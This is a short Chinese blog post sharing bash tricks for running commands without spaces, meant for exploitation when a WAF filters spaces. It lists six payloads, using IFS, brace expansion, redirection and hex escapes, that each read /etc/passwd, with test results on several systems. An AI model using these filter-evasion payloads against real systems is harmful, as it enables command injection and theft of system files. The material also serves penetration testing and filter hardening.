bashtricks :无空格命令执行
2020-03-31 07:19
1116 查看
在一些漏洞利用场景,或者因为waf等原因,导致无法使用空格时,可以试试如下命令:
IFS=,;`cat<<<cat,/etc/passwd`
cat$IFS/etc/passwd
cat${IFS}/etc/passwd
cat</etc/passwd
{cat,/etc/passwd}
X=$'cat\x20/etc/passwd'&&$X
经过测试,除最后一条在mac osx下执行失败,这些命令在ubuntu 19.10和centos7下均执行成功。在mac osx系统下系统会将cat\x20/etc/passwd当成一个可执行文件,会提示No such file or directory。
来源:https://twitter.com/omespino/status/1241544334329208838
- 点赞
- 收藏
- 分享
- 文章举报
insightglacier
发布了11 篇原创文章 · 获赞 0 · 访问量 387
私信
关注
内容来自用户分享和网络整理,不保证内容的准确性,如有侵权内容,可联系管理员处理 
相关文章推荐
- awk -F选项同时指定多个符号做为分割符时遇到空格坑,题目:请执行命令取出 linux 中 eth0 的 IP 地址
- 转:Windows中的命令行提示符里的Start命令执行路径包含空格时的问题
- 命令执行不能使用空格绕过
- 关于cmd中执行命令路径包含空格的解决办法
- Java Runtime.getRuntime().exec() 执行带空格命令
- java执行shell命令中有空格的处理方法
- shell脚本中赋值给变量中有空格, 导致命令执行失败
- windows cmd 执行命令文件路径带有空格的处理方式
- shell中 source命令即点空格后面再跟可执行文件的说明
- [转]Windows中的命令行提示符里的Start命令执行路径包含空格时的问题
- [转]shell中 source命令即点空格后面再跟可执行文件的说明
- Windows中的命令行提示符里的Start命令执行路径包含空格时的问题
- cmd命令执行bat文件目录和参数都带有空格执行出错怎么解决
- java执行shell命令中有空格的处理方法
- 后台权限数据表和linux后台执行脚本命令例子
- shell脚本使用ssh命令连接主机,自动创建目录,分发程序,执行命令
- 巧用watch命令执行循环操作,来解放我们的双手
- java调用cmd执行maven命令
- linux中的source命令和直接执行脚本的区别
- CentOS后台任务执行相关命令